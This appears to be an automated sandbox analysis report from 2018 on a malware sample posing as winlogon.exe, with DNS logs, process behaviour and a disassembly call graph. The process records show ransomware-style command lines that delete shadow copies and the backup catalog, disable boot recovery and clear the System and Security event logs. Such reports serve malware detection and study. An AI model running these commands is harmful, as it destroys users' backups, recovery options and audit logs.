Feb 12, 2018 21:38:37.137315989 CET | 8.8.8.8 | 192.168.2.2 | 0x2ad9 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:37.739259005 CET | 8.8.8.8 | 192.168.2.2 | 0x9754 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:38.164005041 CET | 8.8.8.8 | 192.168.2.2 | 0x9aa7 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:38.718569040 CET | 8.8.8.8 | 192.168.2.2 | 0x4024 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:39.156883001 CET | 8.8.8.8 | 192.168.2.2 | 0x7ff | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:39.673909903 CET | 8.8.8.8 | 192.168.2.2 | 0x3298 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:40.080379009 CET | 8.8.8.8 | 192.168.2.2 | 0x2c13 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:40.572628021 CET | 8.8.8.8 | 192.168.2.2 | 0xf3f5 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:41.035156965 CET | 8.8.8.8 | 192.168.2.2 | 0x1fa9 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:41.578322887 CET | 8.8.8.8 | 192.168.2.2 | 0x715f | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:42.034862995 CET | 8.8.8.8 | 192.168.2.2 | 0x948e | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:42.437918901 CET | 8.8.8.8 | 192.168.2.2 | 0x4034 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:42.868976116 CET | 8.8.8.8 | 192.168.2.2 | 0xde3e | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:43.676775932 CET | 8.8.8.8 | 192.168.2.2 | 0xc681 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:44.106827974 CET | 8.8.8.8 | 192.168.2.2 | 0xee4c | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:44.625426054 CET | 8.8.8.8 | 192.168.2.2 | 0xb3fa | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:45.142456055 CET | 8.8.8.8 | 192.168.2.2 | 0x10f7 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:45.779345989 CET | 8.8.8.8 | 192.168.2.2 | 0xfd81 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:46.238379002 CET | 8.8.8.8 | 192.168.2.2 | 0xc169 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:46.779881954 CET | 8.8.8.8 | 192.168.2.2 | 0xad00 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time:21:38:46
Start date:12/02/2018
Path:C:\Users\user\Desktop\winlogon.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\winlogon.exe'
Imagebase:0xd60000
File size:1861632 bytes
MD5 hash:CFDD16225E67471F5EF54CAB9B3A5558
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:38:46
Start date:12/02/2018
Path:C:\Users\user\AppData\Local\Temp\yegus.exe
Wow64 process (32bit):false
Commandline: 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Imagebase:0x1330000
File size:769536 bytes
MD5 hash:4F43F03783F9789F804DCF9B9474FA6D
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:38:47
Start date:12/02/2018
Path:C:\Users\user\AppData\Local\Temp\ucngw.exe
Wow64 process (32bit):false
Commandline: 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Imagebase:0xc50000
File size:231424 bytes
MD5 hash:6E0EBEEEA1CB00192B074B288A4F9CFE
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:38:49
Start date:12/02/2018
Path:C:\Users\user\AppData\Local\Temp\_usm.exe
Wow64 process (32bit):false
Commandline:C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Imagebase:0x140000
File size:36864 bytes
MD5 hash:3C0D740347B0362331C882C2DEE96DBF
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:38:49
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Imagebase:0x4a9e0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

General

Start time:21:38:50
Start date:12/02/2018
Path:C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):false
Commandline:c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Imagebase:0x6e0000
File size:115200 bytes
MD5 hash:6E248A3D528EDE43994457CF417BD665
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:21:38:51
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Imagebase:0x4a0d0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

General

Start time:21:38:52
Start date:12/02/2018
Path:C:\Windows\System32\wbadmin.exe
Wow64 process (32bit):false
Commandline:wbadmin.exe delete catalog -quiet
Imagebase:0x670000
File size:224768 bytes
MD5 hash:EAB630E7E6A7FC248870A2FCDC098B98
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:21:38:52
Start date:12/02/2018
Path:C:\Windows\System32\wbengine.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbengine.exe
Imagebase:0xbf0000
File size:1203200 bytes
MD5 hash:691E3285E53DCA558E1A84667F13E15A
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:38:52
Start date:12/02/2018
Path:C:\Windows\System32\vdsldr.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vdsldr.exe -Embedding
Imagebase:0x3b0000
File size:19968 bytes
MD5 hash:A2551668C78CEA4089D71A0A3B36FC0C
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:38:53
Start date:12/02/2018
Path:C:\Windows\System32\vds.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vds.exe
Imagebase:0xac0000
File size:453632 bytes
MD5 hash:C3CD30495687C2A2F66A65CA6FD89BE9
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:21:38:55
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Imagebase:0x4a460000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

General

Start time:21:38:55
Start date:12/02/2018
Path:C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):false
Commandline:bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Imagebase:0x5b0000
File size:295936 bytes
MD5 hash:ABD373E82F6240031C1E631AA20711C7
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:21:38:56
Start date:12/02/2018
Path:C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):false
Commandline:bcdedit /set {default} recoveryenabled no
Imagebase:0xcf0000
File size:295936 bytes
MD5 hash:ABD373E82F6240031C1E631AA20711C7
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:21:38:57
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Imagebase:0x4a640000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

General

Start time:21:38:58
Start date:12/02/2018
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil.exe cl System
Imagebase:0x100000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:38:59
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Imagebase:0x4a0d0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

General

Start time:21:39:00
Start date:12/02/2018
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil.exe cl Security
Imagebase:0x4a0000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:39:04
Start date:12/02/2018
Path:C:\Windows\System32\LogonUI.exe
Wow64 process (32bit):false
Commandline:'LogonUI.exe' /flags:0x0
Imagebase:0xcc0000
File size:10752 bytes
MD5 hash:3EF0D8AB08385AAB5802E773511A2E6A
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:21:39:06
Start date:12/02/2018
Path:C:\Windows\System32\LogonUI.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0xcc0000
File size:10752 bytes
MD5 hash:3EF0D8AB08385AAB5802E773511A2E6A
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:13.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:7.1%
    Total number of Nodes:2000
    Total number of Limit Nodes:72

    Graph

d77278 15222->15224 15225 d77310 15222->15225 15227 d717ff __wsopen_s 20 API calls 15224->15227 15231 d77299 __alloca_probe_16 ___scrt_get_show_window_mode 15224->15231 15226 d6abe4 __Stoull 5 API calls 15225->15226 15228 d765af 15226->15228 15227->15231 15234 d792b3 15228->15234 15229 d7730a 15239 d77337 15229->15239 15231->15229 15232 d772de MultiByteToWideChar 15231->15232 15232->15229 15233 d772fa GetStringTypeW 15232->15233 15233->15229 15235 d6e412 __Stoull 37 API calls 15234->15235 15236 d792c6 15235->15236 15243 d79096 15236->15243 15240 d77343 15239->15240 15242 d77354 15239->15242 15241 d717c5 __freea 19 API calls 15240->15241 15240->15242 15241->15242 15242->15225 15245 d790b1 15243->15245 15244 d790d7 MultiByteToWideChar 15248 d79101 15244->15248 15256 d7928b 15244->15256 15245->15244 15246 d6abe4 __Stoull 5 API calls 15247 d765d0 15246->15247 15247->15219 15250 d79122 __alloca_probe_16 15248->15250 15251 d717ff __wsopen_s 20 API calls 15248->15251 15249 d7916b MultiByteToWideChar 15252 d791d7 15249->15252 15253 d79184 15249->15253 15250->15249 15250->15252 15251->15250 15255 d77337 __freea 19 API calls 15252->15255 15270 d74fb1 15253->15270 15255->15256 15256->15246 15258 d791e6 15260 d79207 __alloca_probe_16 15258->15260 15261 d717ff __wsopen_s 20 API calls 15258->15261 15259 d791ae 15259->15252 15262 d74fb1 11 API calls 15259->15262 15263 d7927c 15260->15263 15265 d74fb1 11 API calls 15260->15265 15261->15260 15262->15252 15264 d77337 __freea 19 API calls 15263->15264 15264->15252 15266 d7925b 15265->15266 15266->15263 15267 d7926a WideCharToMultiByte 15266->15267 15267->15263 15268 d792aa 15267->15268 15269 d77337 __freea 19 API calls 15268->15269 15269->15252 15271 d74c37 _GetRangeOfTrysToCheck 5 API calls 15270->15271 15272 d74fd8 15271->15272 15273 d74fe1 15272->15273 15278 d75039 15272->15278 15276 d6abe4 __Stoull 5 API calls 15273->15276 15277 d75033 15276->15277 15277->15252 15277->15258 15277->15259 15279 d74c37 _GetRangeOfTrysToCheck 5 API 
calls 15278->15279 15280 d75060 15279->15280 15281 d6abe4 __Stoull 5 API calls 15280->15281 15282 d75021 LCMapStringW 15281->15282 15282->15273 15284 d762db ___InternalCxxFrameHandler 15283->15284 15291 d75c0f EnterCriticalSection 15284->15291 15286 d762e5 15292 d7633a 15286->15292 15290 d762fe ___InternalCxxFrameHandler 15290->15209 15291->15286 15304 d7ac3a 15292->15304 15294 d76388 15295 d7ac3a 25 API calls 15294->15295 15296 d763a4 15295->15296 15297 d7ac3a 25 API calls 15296->15297 15298 d763c2 15297->15298 15299 d717c5 __freea 19 API calls 15298->15299 15300 d762f2 15298->15300 15299->15300 15301 d76306 15300->15301 15318 d75c57 LeaveCriticalSection 15301->15318 15303 d76310 15303->15290 15305 d7ac4b 15304->15305 15312 d7ac47 15304->15312 15306 d7ac52 15305->15306 15308 d7ac65 ___scrt_get_show_window_mode 15305->15308 15307 d72122 __freea 19 API calls 15306->15307 15309 d7ac57 15307->15309 15311 d7ac93 15308->15311 15308->15312 15314 d7ac9c 15308->15314 15310 d70269 ___std_exception_copy 25 API calls 15309->15310 15310->15312 15313 d72122 __freea 19 API calls 15311->15313 15312->15294 15316 d7ac98 15313->15316 15314->15312 15315 d72122 __freea 19 API calls 15314->15315 15315->15316 15317 d70269 ___std_exception_copy 25 API calls 15316->15317 15317->15312 15318->15303 15882 d71e45 15883 d71e50 15882->15883 15884 d71e60 15882->15884 15888 d71e66 15883->15888 15887 d717c5 __freea 19 API calls 15887->15884 15889 d71e79 15888->15889 15890 d71e7f 15888->15890 15891 d717c5 __freea 19 API calls 15889->15891 15892 d717c5 __freea 19 API calls 15890->15892 15891->15890 15893 d71e8b 15892->15893 15894 d717c5 __freea 19 API calls 15893->15894 15895 d71e96 15894->15895 15896 d717c5 __freea 19 API calls 15895->15896 15897 d71ea1 15896->15897 15898 d717c5 __freea 19 API calls 15897->15898 15899 d71eac 15898->15899 15900 d717c5 __freea 19 API calls 15899->15900 15901 d71eb7 15900->15901 15902 d717c5 __freea 19 API calls 15901->15902 15903 d71ec2 15902->15903 15904 d717c5 
__freea 19 API calls 15903->15904 15905 d71ecd 15904->15905 15906 d717c5 __freea 19 API calls 15905->15906 15907 d71ed8 15906->15907 15908 d717c5 __freea 19 API calls 15907->15908 15909 d71ee6 15908->15909 15914 d71d2c 15909->15914 15920 d71c38 15914->15920 15916 d71d50 15917 d71d7c 15916->15917 15933 d71c99 15917->15933 15919 d71da0 15919->15887 15921 d71c44 ___InternalCxxFrameHandler 15920->15921 15928 d75c0f EnterCriticalSection 15921->15928 15923 d71c78 15929 d71c8d 15923->15929 15924 d71c4e 15924->15923 15927 d717c5 __freea 19 API calls 15924->15927 15926 d71c85 ___InternalCxxFrameHandler 15926->15916 15927->15923 15928->15924 15932 d75c57 LeaveCriticalSection 15929->15932 15931 d71c97 15931->15926 15932->15931 15934 d71ca5 ___InternalCxxFrameHandler 15933->15934 15941 d75c0f EnterCriticalSection 15934->15941 15936 d71caf 15937 d71f0f _GetRangeOfTrysToCheck 19 API calls 15936->15937 15938 d71cc2 15937->15938 15942 d71cd8 15938->15942 15940 d71cd0 ___InternalCxxFrameHandler 15940->15919 15941->15936 15945 d75c57 LeaveCriticalSection 15942->15945 15944 d71ce2 15944->15940 15945->15944 16720 d735bc 16721 d729eb 25 API calls 16720->16721 16722 d735ca 16721->16722 16723 d735f7 16722->16723 16724 d735d8 16722->16724 16726 d73604 16723->16726 16731 d73611 16723->16731 16725 d72122 __freea 19 API calls 16724->16725 16730 d735dd 16725->16730 16727 d72122 __freea 19 API calls 16726->16727 16727->16730 16728 d736a1 16740 d736cd 16728->16740 16731->16728 16731->16730 16732 d78f9e __wsopen_s 25 API calls 16731->16732 16733 d73694 16731->16733 16732->16733 16733->16728 16735 d79039 16733->16735 16736 d717ff __wsopen_s 20 API calls 16735->16736 16737 d79054 16736->16737 16738 d717c5 __freea 19 API calls 16737->16738 16739 d7905e 16738->16739 16739->16728 16741 d729eb 25 API calls 16740->16741 16742 d736dc 16741->16742 16743 d73780 16742->16743 16744 d736ee 16742->16744 16745 d732c5 __wsopen_s 61 API calls 16743->16745 16746 d7370b 16744->16746 16748 d73731 16744->16748 16750 
d73718 16745->16750 16747 d732c5 __wsopen_s 61 API calls 16746->16747 16747->16750 16748->16750 16751 d752fb 16748->16751 16750->16730 16754 d75178 16751->16754 16753 d75311 16753->16750 16755 d75184 ___InternalCxxFrameHandler 16754->16755 16756 d7518c 16755->16756 16761 d751a4 16755->16761 16757 d7210f __wsopen_s 19 API calls 16756->16757 16759 d75191 16757->16759 16758 d75258 16760 d7210f __wsopen_s 19 API calls 16758->16760 16762 d72122 __freea 19 API calls 16759->16762 16763 d7525d 16760->16763 16761->16758 16764 d751dc 16761->16764 16774 d75199 ___InternalCxxFrameHandler 16762->16774 16766 d72122 __freea 19 API calls 16763->16766 16779 d76c41 EnterCriticalSection 16764->16779 16768 d75265 16766->16768 16767 d751e2 16769 d75206 16767->16769 16770 d7521b 16767->16770 16771 d70269 ___std_exception_copy 25 API calls 16768->16771 16773 d72122 __freea 19 API calls 16769->16773 16772 d7527d __wsopen_s 27 API calls 16770->16772 16771->16774 16777 d75216 16772->16777 16775 d7520b 16773->16775 16774->16753 16776 d7210f __wsopen_s 19 API calls 16775->16776 16776->16777 16780 d75250 16777->16780 16779->16767 16783 d76cf8 LeaveCriticalSection 16780->16783 16782 d75256 16782->16774 16783->16782 13138 d6acfe 13139 d6ad0a ___InternalCxxFrameHandler 13138->13139 13162 d6b106 13139->13162 13142 d6ad11 13143 d6ad3a 13142->13143 13188 d6b406 IsProcessorFeaturePresent 13142->13188 13147 d6ad79 13143->13147 13173 d70b98 13143->13173 13145 d6ad59 ___InternalCxxFrameHandler 13152 d6add9 13147->13152 13192 d70e16 13147->13192 13151 d6addf 13185 d67390 GetCommandLineW CommandLineToArgvW 13151->13185 13181 d6b521 13152->13181 13158 d6ae0e 13207 d6b27d 13158->13207 13159 d6ae05 13159->13158 13204 d70df1 13159->13204 13163 d6b10f 13162->13163 13213 d6b6ce IsProcessorFeaturePresent 13163->13213 13167 d6b120 13168 d6b124 13167->13168 13224 d71573 13167->13224 13168->13142 13170 d6b13b 13170->13142 13174 d70baf 13173->13174 13175 d6abe4 __Stoull 5 API calls 13174->13175 13176 d6ad53 
13175->13176 13176->13145 13177 d70b3c 13176->13177 13178 d70b6b 13177->13178 13179 d6abe4 __Stoull 5 API calls 13178->13179 13180 d70b94 13179->13180 13180->13147 13361 d6d520 13181->13361 13184 d6b547 13184->13151 13363 d671e0 13185->13363 13189 d6b41c ___scrt_get_show_window_mode 13188->13189 13190 d6b4c4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13189->13190 13191 d6b50e 13190->13191 13191->13142 13193 d6e7fb _GetRangeOfTrysToCheck 13192->13193 13194 d70e3e 13192->13194 13195 d71f5a _GetRangeOfTrysToCheck 37 API calls 13193->13195 13194->13152 13198 d6e80c 13195->13198 13196 d7184d _GetRangeOfTrysToCheck 37 API calls 13197 d6e836 13196->13197 13198->13196 13199 d6b554 GetModuleHandleW 13200 d6adfb 13199->13200 13200->13159 13201 d70e4e 13200->13201 13202 d70c0f __CreateFrameInfo 27 API calls 13201->13202 13203 d70e5f 13202->13203 13203->13159 13205 d70c0f __CreateFrameInfo 27 API calls 13204->13205 13206 d70dfc 13205->13206 13206->13158 13208 d6b289 13207->13208 13212 d6b29f 13208->13212 14935 d71585 13208->14935 13211 d6d4bf 8 API calls 13211->13212 13212->13145 13214 d6b11b 13213->13214 13215 d6d496 13214->13215 13216 d6d49b 13215->13216 13235 d6de5e 13216->13235 13219 d6d4a9 13219->13167 13221 d6d4b1 13222 d6d4bc 13221->13222 13249 d6de9a 13221->13249 13222->13167 13291 d7777b 13224->13291 13227 d6d4bf 13228 d6d4c8 13227->13228 13234 d6d4d9 13227->13234 13229 d6db5b 6 API calls 13228->13229 13230 d6d4cd 13229->13230 13231 d6de9a DeleteCriticalSection 13230->13231 13232 d6d4d2 13231->13232 13357 d6e172 13232->13357 13234->13168 13237 d6de67 13235->13237 13238 d6de90 13237->13238 13240 d6d4a5 13237->13240 13253 d6e0f2 13237->13253 13239 d6de9a DeleteCriticalSection 13238->13239 13239->13240 13240->13219 13241 d6db28 13240->13241 13272 d6e007 13241->13272 13243 d6db3d 13243->13221 13244 d6db32 13244->13243 13277 d6e0b5 13244->13277 13246 d6db4b 13247 d6db58 13246->13247 13282 d6db5b 13246->13282 13247->13221 13250 d6dea5 
13249->13250 13252 d6dec4 13249->13252 13251 d6deaf DeleteCriticalSection 13250->13251 13251->13251 13251->13252 13252->13219 13258 d6dee6 13253->13258 13256 d6e129 InitializeCriticalSectionAndSpinCount 13257 d6e115 13256->13257 13257->13237 13259 d6df16 13258->13259 13260 d6df1a 13258->13260 13259->13260 13264 d6df3a 13259->13264 13265 d6df86 13259->13265 13260->13256 13260->13257 13262 d6df46 GetProcAddress 13263 d6df56 __CreateFrameInfo 13262->13263 13263->13260 13264->13260 13264->13262 13266 d6dfae LoadLibraryExW 13265->13266 13271 d6dfa3 13265->13271 13267 d6dfca GetLastError 13266->13267 13270 d6dfe2 13266->13270 13269 d6dfd5 LoadLibraryExW 13267->13269 13267->13270 13268 d6dff9 FreeLibrary 13268->13271 13269->13270 13270->13268 13270->13271 13271->13259 13273 d6dee6 __CreateFrameInfo 5 API calls 13272->13273 13274 d6e021 13273->13274 13275 d6e039 TlsAlloc 13274->13275 13276 d6e02a 13274->13276 13276->13244 13278 d6dee6 __CreateFrameInfo 5 API calls 13277->13278 13279 d6e0cf 13278->13279 13280 d6e0e9 TlsSetValue 13279->13280 13281 d6e0de 13279->13281 13280->13281 13281->13246 13283 d6db65 13282->13283 13284 d6db6b 13282->13284 13286 d6e041 13283->13286 13284->13243 13287 d6dee6 __CreateFrameInfo 5 API calls 13286->13287 13288 d6e05b 13287->13288 13289 d6e072 TlsFree 13288->13289 13290 d6e067 13288->13290 13289->13290 13290->13284 13294 d77798 13291->13294 13295 d77794 13291->13295 13292 d6abe4 __Stoull 5 API calls 13293 d6b12d 13292->13293 13293->13170 13293->13227 13294->13295 13297 d74bb5 13294->13297 13295->13292 13298 d74bc1 ___InternalCxxFrameHandler 13297->13298 13309 d75c0f EnterCriticalSection 13298->13309 13300 d74bc8 13310 d76ba9 13300->13310 13302 d74bd7 13303 d74be6 13302->13303 13323 d74a49 GetStartupInfoW 13302->13323 13334 d74c02 13303->13334 13308 d74bf7 ___InternalCxxFrameHandler 13308->13294 13309->13300 13311 d76bb5 ___InternalCxxFrameHandler 13310->13311 13312 d76bd9 13311->13312 13313 d76bc2 13311->13313 13337 d75c0f EnterCriticalSection 
13312->13337 13315 d72122 __freea 19 API calls 13313->13315 13316 d76bc7 13315->13316 13317 d70269 ___std_exception_copy 25 API calls 13316->13317 13319 d76bd1 ___InternalCxxFrameHandler 13317->13319 13318 d76c11 13345 d76c38 13318->13345 13319->13302 13320 d76be5 13320->13318 13338 d76afa 13320->13338 13324 d74a66 13323->13324 13326 d74af8 13323->13326 13325 d76ba9 26 API calls 13324->13325 13324->13326 13328 d74a8f 13325->13328 13329 d74aff 13326->13329 13327 d74abd GetFileType 13327->13328 13328->13326 13328->13327 13333 d74b06 13329->13333 13330 d74b49 GetStdHandle 13330->13333 13331 d74bb1 13331->13303 13332 d74b5c GetFileType 13332->13333 13333->13330 13333->13331 13333->13332 13356 d75c57 LeaveCriticalSection 13334->13356 13336 d74c09 13336->13308 13337->13320 13339 d71890 _GetRangeOfTrysToCheck 19 API calls 13338->13339 13340 d76b0c 13339->13340 13344 d76b19 13340->13344 13348 d74f4d 13340->13348 13341 d717c5 __freea 19 API calls 13342 d76b6b 13341->13342 13342->13320 13344->13341 13355 d75c57 LeaveCriticalSection 13345->13355 13347 d76c3f 13347->13319 13349 d74c37 _GetRangeOfTrysToCheck 5 API calls 13348->13349 13350 d74f74 13349->13350 13351 d74f92 InitializeCriticalSectionAndSpinCount 13350->13351 13353 d74f7d 13350->13353 13351->13353 13352 d6abe4 __Stoull 5 API calls 13354 d74fa9 13352->13354 13353->13352 13354->13340 13355->13347 13356->13336 13358 d6e1a1 13357->13358 13359 d6e17b 13357->13359 13358->13234 13359->13358 13360 d6e18b FreeLibrary 13359->13360 13360->13359 13362 d6b534 GetStartupInfoW 13361->13362 13362->13184 13397 d7d900 13363->13397 13367 d67221 13401 d66500 13367->13401 13369 d67233 13396 d67237 WSACleanup DeleteCriticalSection 13369->13396 13429 d666c0 13369->13429 13375 d67365 13376 d6abe4 __Stoull 5 API calls 13375->13376 13380 d6737d 13376->13380 13380->13199 13565 d68340 13396->13565 13398 d671fb GetCurrentProcessId 13397->13398 13399 d66390 InitializeCriticalSection 13398->13399 13400 d663c6 ___scrt_get_show_window_mode 
13399->13400 13400->13367 13570 d70058 13401->13570 13406 d6652a 13576 d62340 13406->13576 13407 d66526 13407->13369 13409 d66535 13410 d6655e GetModuleHandleA GetModuleFileNameA 13409->13410 13414 d6658d 13409->13414 13586 d62b90 GetCurrentProcess OpenProcessToken 13410->13586 13412 d6657e 13605 d660f0 13412->13605 13416 d6b97b 28 API calls 13414->13416 13417 d66597 13416->13417 13427 d6660f 13417->13427 13635 d63230 13417->13635 13419 d666a2 13419->13369 13420 d63230 79 API calls 13425 d66649 13420->13425 13421 d66678 13421->13419 13422 d6b97b 28 API calls 13421->13422 13423 d666b7 13422->13423 13424 d665ce 13424->13427 13666 d63920 13424->13666 13425->13421 13682 d63b90 13425->13682 13427->13420 13427->13421 13430 d666e6 ___scrt_get_show_window_mode 13429->13430 14326 d65770 13430->14326 13432 d666f4 13433 d6675a 13432->13433 13434 d666f8 GetFileAttributesA 13432->13434 14340 d65c20 13433->14340 13434->13433 13437 d66711 ___scrt_get_show_window_mode 13434->13437 13436 d6675f 13436->13437 13438 d66763 13436->13438 13439 d66724 GetModuleHandleW GetModuleFileNameW 13437->13439 13440 d6abe4 __Stoull 5 API calls 13438->13440 13441 d65dd0 37 API calls 13439->13441 13443 d66752 ExitProcess 13441->13443 13566 d68349 13565->13566 13569 d68359 13565->13569 13567 d70279 25 API calls 13566->13567 13566->13569 13568 d683b5 13567->13568 13569->13375 13695 d6ffd9 13570->13695 13572 d6650a 13573 d6e328 13572->13573 13710 d71f5a GetLastError 13573->13710 13575 d66510 WSAStartup 13575->13406 13575->13407 13577 d623a3 13576->13577 13578 d6251c 13577->13578 13581 d623e8 ___scrt_get_show_window_mode 13577->13581 13579 d6abe4 __Stoull 5 API calls 13578->13579 13580 d6252f 13579->13580 13580->13409 13582 d62500 13581->13582 13854 d67570 13581->13854 13583 d6abe4 __Stoull 5 API calls 13582->13583 13584 d62516 13583->13584 13584->13409 13587 d62bd2 13586->13587 13588 d62be7 GetTokenInformation 13586->13588 13591 d6abe4 __Stoull 5 API calls 13587->13591 13589 d62c0a 13588->13589 13590 
d62cf7 13588->13590 13594 d702c9 ___std_exception_copy 20 API calls 13589->13594 13592 d62d0a 13590->13592 13593 d62d03 CloseHandle 13590->13593 13595 d62be3 13591->13595 13597 d6abe4 __Stoull 5 API calls 13592->13597 13593->13592 13596 d62c13 13594->13596 13595->13412 13596->13590 13598 d62c20 GetTokenInformation 13596->13598 13599 d62d1d 13597->13599 13600 d62cec 13598->13600 13603 d62c3a ___scrt_get_show_window_mode 13598->13603 13599->13412 13601 d7009a ___std_exception_copy 20 API calls 13600->13601 13601->13590 13602 d62c61 LookupPrivilegeNameW 13602->13603 13603->13600 13603->13602 13604 d62c89 AdjustTokenPrivileges 13603->13604 13604->13603 13606 d66157 13605->13606 13607 d6611e ___scrt_get_show_window_mode 13605->13607 13608 d6614b ___scrt_get_show_window_mode 13606->13608 13609 d6619e GetModuleHandleA GetProcAddress 13606->13609 13610 d66131 GetVersionExW 13607->13610 13608->13606 13613 d66174 GetVersionExW 13608->13613 13611 d661bb 13609->13611 13612 d661c0 GetCurrentProcess IsWow64Process 13609->13612 13610->13606 13610->13608 13885 d62eb0 13611->13885 13612->13611 13613->13609 13615 d6618e 13613->13615 13615->13609 13616 d66219 13915 d6eab8 13616->13915 13619 d6eab8 __Stoull 42 API calls 13620 d66247 13619->13620 13621 d66266 13620->13621 13622 d7009a ___std_exception_copy 20 API calls 13620->13622 13622->13621 13636 d6348e 13635->13636 13637 d63253 13635->13637 13638 d6abe4 __Stoull 5 API calls 13636->13638 13637->13636 14086 d6a670 13637->14086 13640 d6349d 13638->13640 13640->13424 13641 d63284 13642 d6abe4 __Stoull 5 API calls 13641->13642 13643 d63296 13642->13643 13643->13424 13644 d63280 13644->13641 14097 d6aad0 13644->14097 13646 d63304 13646->13641 14108 d6a6f0 13646->14108 13650 d6333b 13650->13641 13651 d63346 13650->13651 13651->13636 14124 d6a840 13651->14124 13653 d6336e 